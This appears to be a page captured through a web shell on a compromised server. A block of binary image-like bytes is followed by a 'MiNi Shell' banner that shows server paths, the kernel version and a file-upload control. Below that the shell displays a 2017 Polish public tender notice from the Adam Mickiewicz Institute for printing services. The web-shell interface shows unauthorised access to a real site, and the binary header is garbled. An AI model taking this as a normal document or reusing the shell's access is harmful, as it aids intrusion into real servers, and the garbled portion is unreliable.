JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170321/48309-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://https://iam.pl/pl/bip/przetargi' target='_blank'>http://https://iam.pl/pl/bip/przetargi</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 48309 - 2017
              z dnia 2017-03-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Usługa druku w podziale na 4 zadania<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Instytut Adama Mickiewicza, krajowy numer identyfikacyjny
              14047007100000, ul.
              ul. Mokotowska 
              25,
              00560  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              224 476 100, e-mail
              iam@iam.pl, faks
              224 476 152.
              <br />
              Adres strony internetowej (URL): www.iam.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Państwowa Instytucja Kultury</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.iam.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />https://iam.pl/pl/bip/przetargi</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Instytut Adama Mickiewicza ul. Mokotowska 25  00-560 Warszawa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usługa druku w podziale na 4 zadania<br /><b>Numer referencyjny: </b>2/IAM/2017/03<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />4<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa druku w podziale na 4 zadania, Zamawiający podzielił zamówienie na 4 zadania:
Zadanie nr 1  Projekty dla programu Kreatywna Europa  komponent Kultura
Zadanie nr 2  Projekty dla programu Kreatywna Europa  komponent Media
Zadanie nr 3 -  Projekty dla programu Europa dla obywateli
Zadanie nr 4 -  Kalendarz książkowy  EDO 2018
szczegółowy opis przedmiotu zamówienia stanowią załączniki od 1A do 1 D, do SIWZ.<br /><br /><b>II.5) Główny kod CPV: </b>79823000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowego  warunku w ww. zakresie.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowego  warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczegółowego  warunku w ww. zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenia w zakresie wskazanym w załączniku nr 3 i 4  do SIWZ. Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Oświadczenie wykonawca składa zgodnie ze wzorem stanowiącym załączniki  nr 3 i 4  do SIWZ.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Wzór oświadczenia stanowi załącznik nr 5 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Łączna cena ofertowa brutto</td><td>50</td></tr><tr><td>Jakość</td><td>50</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/03/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1.Na podstawie art. 36 b ust. 1 ustawy Wykonawca jest zobowiązany umieścić w składanej ofercie informację o części zamówienia, którą zamierza powierzyć podwykonawcom i podania przez wykonawcę firm podwykonawców. Zamawiający nie zastrzega żadnej części zamówienia, która nie może być powierzona podwykonawcom.
2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia, o których mowa w art. 6 ust. 2 niniejszej SIWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia mają potwierdzać spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia. 
3.	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia - w zakresie, w jakim powołuje się na ich zasoby - warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w art. 6 ust. 2 niniejszej SIWZ.
4.	Jeżeli Wykonawca polega na zasobach lub sytuacji podmiotu trzeciego, Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Podmiot, który zobowiązał się do udostępnienia swoich zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.
